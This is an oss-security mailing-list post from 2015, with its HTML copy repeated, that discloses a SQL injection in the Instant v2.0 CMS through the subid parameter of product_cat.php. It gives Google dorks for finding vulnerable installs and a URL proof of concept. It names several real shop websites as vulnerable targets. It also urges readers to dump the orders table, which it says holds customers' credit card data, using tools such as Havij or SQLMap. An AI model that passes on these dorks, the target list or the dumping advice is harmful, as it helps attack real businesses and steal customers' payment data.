Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 10 Mar 2015 02:09:32 +0700
From: "Steevee a.k.a Stefanus" <steevee.aka@...il.com>
To: oss-security@...ts.openwall.com
Subject: Instant v2.0 SQL Injection Vulnerability

==========================================================================================
Instant v2.0 SQL Injection Vulnerability
==========================================================================================

:-------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Instant v2.0 SQL Injection Vulnerability
: # Date : 10th March 2015
: # Author : X-Cisadane
: # CMS Name : Instant v2.0 (another OverCoffee production)
: # CMS Developer : overcoffee.com
: # Version : 2.0
: # Category : Web Applications
: # Vulnerability : SQL Injection
: # Tested On : Google Chrome Version 40.0.2214.115 m (Windows 7), Havij
1.16 Pro & SQLMap 1.0-dev-nongit-20150125
: # Greetz to : Explore Crew, CodeNesia, Bogor Hackers Community, Ngobas
and Winda Utari
:-------------------------------------------------------------------------------------------------------------------------:

A SQL Injection Vulnerability has been discovered in the Instant v.2.0 CMS.
The Vulnerability is located in the subid Value of the product_cat.php
File. Attackers are able to execute own SQL commands
by usage of a GET Method Request with manipulated subid Value.
Attackers are able to read Database information by execution of own SQL
commands.

DORKS (How to find the target) :
================================
"Powered By Instant" inurl:/catalog/
inurl:/product_cat.php?subid=
Or use your own Google Dorks :)

Proof of Concept
================

SQL Injection
PoC :
http://[Site]/[Path]/product_cat.php/subid=['SQLi]
And you have to change the URL structure to
http://[Site]/[Path]/product_cat.php?subid=['SQLi]

Example :
http://www.cynthiawebbdesigns.com/catalog/product_cat.php/subid=16617/index.html?PHPSESSID=3ef7e156add41316201ffe87bd489a7d

Just change the URL structure to
http://www.cynthiawebbdesigns.com/catalog/product_cat.php?subid='16617
And you'll see this error notice : You have an error in your SQL syntax;
check the manual that corresponds to your MySQL ...

Note : This CMS stored Credit Card Infos on the Database, just open your
Fav Tool and Dump the orders Table
PIC / PoC : http://i59.tinypic.com/4l0poh.png

Another Vuln Sites :
http://www.unitymarketingonline.com/catalog/product_cat.php?subid=['SQLi]
http://www.peacefulinspirations.net/catalog/product_cat.php?subid=['SQLi]
http://www.dickensgifts.com/catalog/product_cat.php?subid=['SQLi]
http://www.frogandprincellc.com/catalog/product_cat.php?subid=['SQLi]
http://www.debrekht.com/catalog/product_cat.php?subid=['SQLi]
... etc ...

-= Regards =-
 Steevee A.K.A

[ CONTENT OF TYPE text/html SKIPPED ]

========================================================================================== 
Instant v2.0 SQL Injection Vulnerability 
========================================================================================== 

:-------------------------------------------------------------------------------------------------------------------------: 
: # Exploit Title : Instant v2.0 SQL Injection Vulnerability 
: # Date : 10th March 2015  
: # Author : X-Cisadane 
: # CMS Name : Instant v2.0 (another OverCoffee production) 
: # CMS Developer : overcoffee.com 
: # Version : 2.0  
: # Category : Web Applications  
: # Vulnerability : SQL Injection 
: # Tested On : Google Chrome Version 40.0.2214.115 m (Windows 7), Havij 1.16 Pro & SQLMap 1.0-dev-nongit-20150125 
: # Greetz to : Explore Crew, CodeNesia, Bogor Hackers Community, Ngobas and Winda Utari 
:-------------------------------------------------------------------------------------------------------------------------: 

A SQL Injection Vulnerability has been discovered in the Instant v.2.0 CMS. 
The Vulnerability is located in the subid Value of the product_cat.php File. Attackers are able to execute own SQL commands 
by usage of a GET Method Request with manipulated subid Value. 
Attackers are able to read Database information by execution of own SQL commands. 
  
DORKS (How to find the target) : 
================================ 
"Powered By Instant" inurl:/catalog/ 
inurl:/product_cat.php?subid= 
Or use your own Google Dorks :) 

Proof of Concept  
================  

SQL Injection 
PoC :  
http://[Site]/[Path]/product_cat.php/subid=['SQLi]  
And you have to change the URL structure to  
http://[Site]/[Path]/product_cat.php?subid=['SQLi] 

Example : 
http://www.cynthiawebbdesigns.com/catalog/product_cat.php/subid=16617/index.html?PHPSESSID=3ef7e156add41316201ffe87bd489a7d 
Just change the URL structure to http://www.cynthiawebbdesigns.com/catalog/product_cat.php?subid='16617 
And you'll see this error notice : You have an error in your SQL syntax; check the manual that corresponds to your MySQL ... 

Note : This CMS stored Credit Card Infos on the Database, just open your Fav Tool and Dump the orders Table 
PIC / PoC : http://i59.tinypic.com/4l0poh.png 

Another Vuln Sites : 
http://www.unitymarketingonline.com/catalog/product_cat.php?subid=['SQLi] 
http://www.peacefulinspirations.net/catalog/product_cat.php?subid=['SQLi] 
http://www.dickensgifts.com/catalog/product_cat.php?subid=['SQLi] 
http://www.frogandprincellc.com/catalog/product_cat.php?subid=['SQLi] 
http://www.debrekht.com/catalog/product_cat.php?subid=['SQLi] 
... etc ...

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ